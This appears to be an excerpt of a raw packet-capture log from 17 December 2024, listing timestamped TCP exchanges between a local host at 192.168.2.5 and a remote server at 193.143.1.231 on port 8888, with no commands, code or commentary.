                Dec 17, 2024 15:16:15.576466084 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.576522112 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.578979969 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.579206944 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.579273939 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.584498882 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.584536076 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.584681034 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.585355043 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.585555077 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.585632086 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.587970018 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.588129997 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.588192940 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.589720011 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.590426922 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.590488911 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.592134953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.592324018 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.592386007 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.594750881 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.594948053 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.595004082 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.597434044 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.597587109 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.597646952 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.600071907 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.600286961 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.600349903 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.602643967 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.602829933 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.602890968 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.605324984 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.605555058 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.605679035 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.607980013 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.608084917 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.608145952 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.610474110 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.610671043 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.610743999 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.613261938 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.613466978 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.613528013 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.615756989 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.615958929 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.616015911 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.618561983 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.618680000 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.618737936 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.621028900 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.621233940 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.621294975 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.623647928 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.623847961 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.623909950 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.626342058 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.626513004 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.626574993 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.628978968 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.629122972 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.629189014 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.631608009 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.631799936 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.631870985 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.634210110 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.634357929 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.634437084 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.636826992 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.637012959 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.637073040 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.639529943 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.639666080 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.639729977 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.642083883 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.642261028 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.642327070 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.644893885 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.645116091 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.645183086 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.647382021 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.647552013 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.647610903 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.746820927 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.746934891 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.747003078 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.747838974 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.748018026 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.748079062 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.749557018 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.749759912 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.749820948 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.751697063 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.751871109 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.751929045 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.753906012 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.754103899 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.754164934 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.756161928 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.756341934 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.756400108 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.758125067 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.758294106 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.758357048 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.760313034 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.760526896 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.760590076 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.762233019 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.762435913 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.762495041 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.764204979 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.764419079 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.764492035 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.766186953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.766379118 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.766438007 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.768177986 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.768357038 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.768419027 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.770117998 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.770306110 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.770366907 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.771995068 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.772200108 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.772262096 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.773917913 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.774090052 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.774148941 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.775789022 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.775988102 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.776046038 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.777697086 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.777879953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.777937889 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.779612064 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.779838085 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.779906988 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.781466007 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.781666040 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.781725883 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.783373117 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.783544064 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.783606052 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.785265923 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.785470963 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.785531044 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.787241936 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.787453890 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.787513971 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.789199114 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.789347887 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.789408922 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.790958881 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.791169882 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.791229963 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.792917967 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.793217897 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.793277025 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.794836044 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.795032978 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.795092106 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.796637058 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.796808958 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.796870947 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.798640966 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.798795938 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.798854113 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.800589085 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.800729036 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.800786972 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.802284002 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.802486897 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.802546978 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.804199934 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.804390907 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.804450989 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.806119919 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.806334019 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.806392908 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.807987928 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.808167934 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.808226109 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.809959888 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.810086966 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.810147047 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.811779022 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.811990976 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.812050104 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.813652992 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.813848019 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.813906908 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.815587997 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.815769911 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.815828085 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.817440033 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.817634106 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.817692041 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.819341898 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.819514990 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.819571972 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.821261883 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.821491957 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.821552038 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.823251963 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.823394060 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.823451996 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.825247049 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.825460911 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.825520039 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.827076912 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.827282906 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.827353001 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.828809977 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.829006910 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.829070091 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.830689907 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.830883026 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.830940962 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.832690001 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.832880974 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.832938910 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.834927082 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.835091114 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.835149050 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.836534023 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.836719990 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.836777925 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.838279963 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.838438988 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.838495970 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.840251923 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.840396881 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.840456963 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.842056990 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.842235088 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.842295885 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.843950033 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.844130993 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.844189882 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.938777924 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.938949108 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.939032078 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.939517021 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.939740896 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.939805031 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.942533970 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.942684889 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.942744017 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.942960978 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.943378925 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.943444014 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.943649054 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.944803953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.944864035 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.944993973 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.946424961 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.946491003 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.946578979 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.947886944 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.947946072 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.948002100 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.949440956 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.949505091 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.949593067 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.950858116 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.950927019 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.950998068 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.952310085 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.952373981 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.952481031 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.953761101 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.953820944 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.953877926 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.955275059 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.955348969 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.955424070 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.956614971 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.956675053 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.956814051 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.958058119 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.958117962 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.958215952 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.959435940 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.959496975 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.959553003 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.960882902 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.960943937 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.961031914 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.962187052 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.962248087 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.962333918 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.963515043 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.963572979 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.963669062 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.964951992 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.965013027 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.965136051 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.966195107 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.966254950 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.966386080 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.967569113 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.967628956 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.967731953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.968883991 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.968943119 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.969029903 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.970227003 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.970288992 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.970393896 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.971524000 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.971584082 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.971672058 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.972922087 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.972984076 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.973071098 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.974153042 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.974220991 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.974328041 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.975538015 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.975599051 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.975670099 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.976783991 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.976861954 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.976950884 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.978162050 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.978224039 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.978410006 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.979456902 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.979516029 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.979675055 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.980861902 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.980922937 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.980971098 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.982085943 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.982142925 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.982280970 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.983413935 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.983469963 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.983556986 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.984761953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.984822989 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.984916925 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.986130953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.986188889 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.986244917 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.987442970 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.987504005 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.987652063 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.989025116 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.989083052 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.989136934 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.990140915 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.990200996 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.990287066 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.991391897 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.991451025 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.991506100 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.992685080 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.992748022 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.992914915 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.994009018 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.994075060 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.994138956 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.995341063 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.995400906 CET497098888192.168.2.5193.143.1.231
